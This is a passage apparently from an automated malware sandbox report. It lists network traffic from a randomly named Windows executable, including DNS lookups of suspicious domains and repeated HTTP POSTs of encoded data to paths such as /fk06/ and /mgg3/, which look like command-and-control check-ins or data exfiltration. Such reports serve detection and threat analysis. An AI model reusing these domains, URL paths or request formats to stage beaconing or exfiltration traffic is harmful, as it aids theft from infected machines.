                                                                    Jan 11, 2025 06:33:25.301275969 CET8049739136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:25.301438093 CET4973980192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:26.317272902 CET4973980192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:27.332572937 CET4974080192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:27.337563992 CET8049740136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:27.337718964 CET4974080192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:27.349263906 CET4974080192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:27.354079008 CET8049740136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:27.354242086 CET8049740136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:27.927623034 CET8049740136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:27.927685022 CET8049740136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:27.927752018 CET4974080192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:28.860796928 CET4974080192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:29.879889011 CET4974180192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:29.884854078 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:29.885032892 CET4974180192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:29.892448902 CET4974180192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:29.897248983 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:30.481340885 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:30.481381893 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:30.481394053 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:30.481417894 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:30.481427908 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:30.481442928 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:30.481554985 CET4974180192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:30.481668949 CET4974180192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:30.484431982 CET4974180192.168.2.8136.143.186.12
                                                                    Jan 11, 2025 06:33:30.489319086 CET8049741136.143.186.12192.168.2.8
                                                                    Jan 11, 2025 06:33:36.051342010 CET4974280192.168.2.8199.192.21.169
                                                                    Jan 11, 2025 06:33:36.056273937 CET8049742199.192.21.169192.168.2.8
                                                                    Jan 11, 2025 06:33:36.056411982 CET4974280192.168.2.8199.192.21.169
                                                                    Jan 11, 2025 06:33:36.068542957 CET4974280192.168.2.8199.192.21.169
                                                                    Jan 11, 2025 06:33:36.074282885 CET8049742199.192.21.169192.168.2.8
                                                                    Jan 11, 2025 06:33:36.708457947 CET8049742199.192.21.169192.168.2.8
                                                                    Jan 11, 2025 06:33:36.708487034 CET8049742199.192.21.169192.168.2.8
                                                                    Jan 11, 2025 06:33:36.708620071 CET4974280192.168.2.8199.192.21.169

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 11, 2025 06:31:32.028841972 CET5802153192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:31:32.041415930 CET53580211.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:31:50.474159956 CET5468253192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:31:50.481337070 CET53546821.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:31:58.553349972 CET5223753192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:31:59.100403070 CET53522371.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:32:13.818082094 CET5144853192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:32:13.845303059 CET53514481.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:32:27.149872065 CET5064953192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:32:27.469769001 CET53506491.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:32:40.724075079 CET5184753192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:32:41.147919893 CET53518471.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:32:55.014647961 CET6100253192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:32:55.043040037 CET53610021.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:33:08.614214897 CET6295153192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:33:08.685661077 CET53629511.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:33:21.942370892 CET5207253192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:33:22.164094925 CET53520721.1.1.1192.168.2.8
                                                                    Jan 11, 2025 06:33:35.489228010 CET5100153192.168.2.81.1.1.1
                                                                    Jan 11, 2025 06:33:36.047503948 CET53510011.1.1.1192.168.2.8

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 11, 2025 06:31:32.028841972 CET192.168.2.81.1.1.10x683fStandard query (0)www.healthyloveforall.netA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:31:50.474159956 CET192.168.2.81.1.1.10x3f9eStandard query (0)www.bonusgame2024.onlineA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:31:58.553349972 CET192.168.2.81.1.1.10x7032Standard query (0)www.zz82x.topA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:13.818082094 CET192.168.2.81.1.1.10x7e2Standard query (0)www.ophthalmo.cloudA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:27.149872065 CET192.168.2.81.1.1.10xe19bStandard query (0)www.ngmr.xyzA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:40.724075079 CET192.168.2.81.1.1.10x879bStandard query (0)www.specialgift.asiaA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:55.014647961 CET192.168.2.81.1.1.10x29b4Standard query (0)www.030002803.xyzA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:08.614214897 CET192.168.2.81.1.1.10x8269Standard query (0)www.2bhp.comA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:21.942370892 CET192.168.2.81.1.1.10xba2dStandard query (0)www.lanxuanz.techA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:35.489228010 CET192.168.2.81.1.1.10x391bStandard query (0)www.astrafusion.xyzA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 11, 2025 06:31:32.041415930 CET1.1.1.1192.168.2.80x683fNo error (0)www.healthyloveforall.nethealthyloveforall.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 06:31:32.041415930 CET1.1.1.1192.168.2.80x683fNo error (0)healthyloveforall.net3.33.130.190A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:31:32.041415930 CET1.1.1.1192.168.2.80x683fNo error (0)healthyloveforall.net15.197.148.33A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:31:50.481337070 CET1.1.1.1192.168.2.80x3f9eName error (3)www.bonusgame2024.onlinenonenoneA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:31:59.100403070 CET1.1.1.1192.168.2.80x7032No error (0)www.zz82x.topzz82x.topCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 06:31:59.100403070 CET1.1.1.1192.168.2.80x7032No error (0)zz82x.top38.47.232.196A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:13.845303059 CET1.1.1.1192.168.2.80x7e2No error (0)www.ophthalmo.cloud217.160.0.207A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:27.469769001 CET1.1.1.1192.168.2.80xe19bNo error (0)www.ngmr.xyz54.67.87.110A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:41.147919893 CET1.1.1.1192.168.2.80x879bNo error (0)www.specialgift.asiawww.specialgift.asia.s.strikinglydns.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:41.147919893 CET1.1.1.1192.168.2.80x879bNo error (0)www.specialgift.asia.s.strikinglydns.com35.156.117.131A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:41.147919893 CET1.1.1.1192.168.2.80x879bNo error (0)www.specialgift.asia.s.strikinglydns.com18.157.120.97A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:32:55.043040037 CET1.1.1.1192.168.2.80x29b4No error (0)www.030002803.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:08.685661077 CET1.1.1.1192.168.2.80x8269No error (0)www.2bhp.comwebforward.lcn.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:08.685661077 CET1.1.1.1192.168.2.80x8269No error (0)webforward.lcn.comfwd3.hosts.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:08.685661077 CET1.1.1.1192.168.2.80x8269No error (0)fwd3.hosts.co.uk85.233.160.22A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:08.685661077 CET1.1.1.1192.168.2.80x8269No error (0)fwd3.hosts.co.uk85.233.160.23A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:08.685661077 CET1.1.1.1192.168.2.80x8269No error (0)fwd3.hosts.co.uk85.233.160.24A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:22.164094925 CET1.1.1.1192.168.2.80xba2dNo error (0)www.lanxuanz.techzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:22.164094925 CET1.1.1.1192.168.2.80xba2dNo error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 06:33:36.047503948 CET1.1.1.1192.168.2.80x391bNo error (0)www.astrafusion.xyz199.192.21.169A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.healthyloveforall.net
                                                                    • www.zz82x.top
                                                                    • www.ophthalmo.cloud
                                                                    • www.ngmr.xyz
                                                                    • www.specialgift.asia
                                                                    • www.030002803.xyz
                                                                    • www.2bhp.com
                                                                    • www.lanxuanz.tech
                                                                    • www.astrafusion.xyz

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.8497103.33.130.190805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:31:32.060307026 CET523OUTGET /r22w/?1ZqD=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.healthyloveforall.net
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:31:40.439129114 CET385INHTTP/1.1 200 OK
                                                                    content-type: text/html
                                                                    date: Sat, 11 Jan 2025 05:31:40 GMT
                                                                    content-length: 264
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 5a 71 44 3d 45 73 52 58 58 37 76 45 6e 55 4a 41 50 34 35 39 6f 39 45 50 47 68 47 2f 5a 61 31 54 44 71 4b 6f 39 2f 6e 53 59 37 4c 5a 4f 36 6b 79 39 76 6f 2f 35 7a 75 78 37 37 5a 61 6f 71 4a 64 77 35 37 4e 68 72 69 73 66 35 65 31 43 33 54 51 46 4c 4e 4c 69 4e 63 71 49 48 4a 77 68 53 79 73 73 67 32 77 62 74 62 36 6a 31 41 4d 4d 63 76 65 32 50 65 54 7a 79 71 33 64 67 35 39 36 38 59 65 33 41 33 52 37 51 3d 3d 26 64 62 46 58 36 3d 4a 4c 6e 4c 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1ZqD=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==&dbFX6=JLnL0"}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.84971438.47.232.196805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:31:59.119663000 CET766OUTPOST /fk06/ HTTP/1.1
                                                                    Host: www.zz82x.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.zz82x.top
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.zz82x.top/fk06/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 62 56 69 6d 6e 38 68 42 6a 73 55 55 78 35 4c 44 4a 43 4c 6c 52 6f 38 43 67 42 69 56 79 75 34 51 56 75 63 66 51 74 73 58 7a 62 43 6a 6a 45 33 63 4d 69 78 4a 32 2b 65 38 6f 2b 4e 42 51 30 77 79 52 4a 70 74 33 61 38 73 74 6a 76 4c 69 4b 50 2b 5a 4b 39 62 70 34 6f 38 6b 4e 36 46 4d 6c 78 55 52 2b 42 6d 6f 73 52 50 51 57 58 35 52 73 75 6b 41 73 45 56 70 2f 5a 74 74 31 78 2f 41 48 5a 6d 71 72 69 49 48 51 43 63 65 6a 38 57 5a 4b 68 4f 66 79 59 31 4a 67 39 36 51 54 4f 56 61 62 7a 49 70 69 4f 4f 6b 38 54 46 4b 6b 78 50 59 6c 68 48 36 4c 36 6d 6b 57 6d 65 7a 4d 3d
                                                                    Data Ascii: 1ZqD=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Jg96QTOVabzIpiOOk8TFKkxPYlhH6L6mkWmezM=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.84971538.47.232.196805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:01.666533947 CET786OUTPOST /fk06/ HTTP/1.1
                                                                    Host: www.zz82x.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.zz82x.top
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.zz82x.top/fk06/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 37 46 69 6e 47 38 68 48 44 73 58 49 68 35 4c 4b 70 43 50 6c 52 55 38 43 69 74 79 56 67 61 34 51 33 47 63 65 56 42 73 57 7a 62 43 74 44 45 32 53 73 69 34 4a 32 7a 2b 38 71 71 4e 42 52 51 77 79 55 6c 70 74 67 47 2f 32 64 6a 74 44 43 4b 4e 7a 35 4b 39 62 70 34 6f 38 6b 59 66 46 4e 42 78 55 42 4f 42 30 4a 73 57 47 77 57 51 78 78 73 75 7a 77 73 41 56 70 2f 42 74 76 42 4c 2f 47 4c 5a 6d 76 58 69 49 55 49 44 46 75 6a 2b 49 5a 4c 2f 59 64 65 51 35 62 6b 6a 77 53 54 64 56 59 61 58 4a 66 50 6b 55 47 30 56 47 4b 4d 61 50 62 4e 58 43 4e 57 53 38 48 47 57 41 6b 59 41 6b 67 7a 76 2b 75 46 6b 33 64 6f 6c 72 37 47 41 50 30 70 48
                                                                    Data Ascii: 1ZqD=3wyGWJa50eJ6l7FinG8hHDsXIh5LKpCPlRU8CityVga4Q3GceVBsWzbCtDE2Ssi4J2z+8qqNBRQwyUlptgG/2djtDCKNz5K9bp4o8kYfFNBxUBOB0JsWGwWQxxsuzwsAVp/BtvBL/GLZmvXiIUIDFuj+IZL/YdeQ5bkjwSTdVYaXJfPkUG0VGKMaPbNXCNWS8HGWAkYAkgzv+uFk3dolr7GAP0pH


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.84971638.47.232.196805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:04.208389997 CET1803OUTPOST /fk06/ HTTP/1.1
                                                                    Host: www.zz82x.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.zz82x.top
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.zz82x.top/fk06/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 37 46 69 6e 47 38 68 48 44 73 58 49 68 35 4c 4b 70 43 50 6c 52 55 38 43 69 74 79 56 67 43 34 51 6d 6d 63 66 79 56 73 45 6a 62 43 7a 54 45 7a 53 73 6a 34 4a 32 72 68 38 71 6e 34 42 53 34 77 79 32 74 70 35 46 79 2f 34 74 6a 74 63 53 4b 49 2b 5a 4b 73 62 70 6f 6b 38 6b 49 66 46 4e 42 78 55 44 57 42 78 6f 73 57 41 77 57 58 35 52 73 69 6b 41 73 6f 56 70 6e 2f 74 76 46 62 2b 32 72 5a 6c 4c 4c 69 4c 6e 73 44 61 65 6a 34 63 35 4c 33 59 64 54 4f 35 62 4a 63 77 54 33 7a 56 61 4b 58 49 70 79 37 4e 58 31 4a 61 73 51 46 4d 71 39 30 4d 75 71 68 79 31 48 6d 45 56 30 75 71 33 2f 38 2b 50 51 72 39 50 68 74 35 63 4f 70 42 68 73 55 73 68 52 4a 74 39 43 78 54 59 6c 2f 30 57 76 53 6a 6a 74 6c 4f 37 71 73 6b 46 2b 69 66 5a 6d 45 32 59 47 76 6d 4b 51 72 72 6c 79 6b 6c 30 6b 44 62 32 46 58 46 71 6b 58 31 4c 61 4c 6e 46 32 6c 4a 45 36 74 77 74 62 75 63 71 4b 37 48 6f 45 68 62 63 6a 36 55 72 74 67 30 4c 66 38 58 72 6e 54 72 32 67 7a 30 46 6e 72 37 64 6b 4e 7a 61 44 67 46 [TRUNCATED]
                                                                    Data Ascii: 1ZqD=3wyGWJa50eJ6l7FinG8hHDsXIh5LKpCPlRU8CityVgC4QmmcfyVsEjbCzTEzSsj4J2rh8qn4BS4wy2tp5Fy/4tjtcSKI+ZKsbpok8kIfFNBxUDWBxosWAwWX5RsikAsoVpn/tvFb+2rZlLLiLnsDaej4c5L3YdTO5bJcwT3zVaKXIpy7NX1JasQFMq90Muqhy1HmEV0uq3/8+PQr9Pht5cOpBhsUshRJt9CxTYl/0WvSjjtlO7qskF+ifZmE2YGvmKQrrlykl0kDb2FXFqkX1LaLnF2lJE6twtbucqK7HoEhbcj6Urtg0Lf8XrnTr2gz0Fnr7dkNzaDgFwmfEVEdLq2QXL1WJvp15LdpbdtKLXKnDE5xGynw1C/JsTEQJuW9twQbDkE7AWynyqbJggzgqhP7qcfHOvyN129++uUEBzvuzYdNwY6541ttHwDN19gXJaLU4stKh1x4eX6JVGfPyFVAl23tSj1IX1SN3Ghwyge/azmlt8Ei02Oge4wsz7vV2Ebxp5G/aGR2PKuPcq8hyWBINn5gVIjI/twvhio4X3jEx6DX9YzI/FRLwWjbvUwQxc1Dyl1QT6dLqyiUs/5ePgICOXay6OCuXXzMvERG4DrZFfxGVajvFfaaOUTnvEdTUOij9tSlXINY8BhD+2e6H6izJX2hvpH+VJR+gOU66s535qx9WustEFaJ+/Lhh8MMd7YHZi/eppl8cM7AThmtXruK+dThHAKyCDsLYiXb0EWvpPjoiXyyJuQwZkoHMz2tsAKS/wVDA+eo6KM7QmFaQWnEGDCRTSxlaKVrk60Tmt8YiazsSbQKPYZAN7a/aYeQt/p0m3tGi7gbLEXxDSKem3A0WFpdMYolE5STjcdFRHJx0d7bpHiIzzocbcWVOPD2snQtXOkUYSKCXWhPg7Cae65MTcg1MubMX4VbZPmlfV6l94e/LhmXM7+H1Ewvd0yzEmYbVAnTXJW4xe4LxSTs+N7IJ3JZUp75NdDE6mWy3sMbngo [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.84971738.47.232.196805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:06.753786087 CET511OUTGET /fk06/?1ZqD=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.zz82x.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.849718217.160.0.207805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:13.866683006 CET784OUTPOST /mgg3/ HTTP/1.1
                                                                    Host: www.ophthalmo.cloud
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ophthalmo.cloud
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ophthalmo.cloud/mgg3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 70 4d 50 46 43 68 37 66 31 70 67 4f 4c 33 49 52 73 6b 67 63 35 30 2b 4a 55 68 44 30 75 50 6b 6f 77 32 53 4c 6b 62 35 41 4d 4e 78 52 65 66 6f 4a 56 73 48 79 74 4c 50 31 4d 49 78 73 58 72 66 52 71 78 63 7a 4d 5a 64 6a 7a 32 35 6c 34 2f 4b 46 50 47 6b 71 2f 36 66 4a 32 37 48 77 2f 50 62 58 31 68 6f 46 59 78 68 46 57 67 41 41 69 33 6a 31 69 36 39 39 79 55 56 51 41 56 4e 66 53 6c 61 35 79 53 2f 44 53 4c 38 6b 79 39 72 6d 2f 58 76 4d 63 53 41 37 46 64 6b 4f 33 66 6c 54 41 49 2f 39 33 65 50 73 34 70 67 45 41 6c 71 38 43 2b 73 37 77 52 75 45 4d 6e 64 6f 6d 69 77 3d
                                                                    Data Ascii: 1ZqD=tGqcJQu3iOnopMPFCh7f1pgOL3IRskgc50+JUhD0uPkow2SLkb5AMNxRefoJVsHytLP1MIxsXrfRqxczMZdjz25l4/KFPGkq/6fJ27Hw/PbX1hoFYxhFWgAAi3j1i699yUVQAVNfSla5yS/DSL8ky9rm/XvMcSA7FdkO3flTAI/93ePs4pgEAlq8C+s7wRuEMndomiw=
                                                                    Jan 11, 2025 06:32:14.495951891 CET779INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Date: Sat, 11 Jan 2025 05:32:14 GMT
                                                                    Server: Apache
                                                                    X-Frame-Options: deny
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
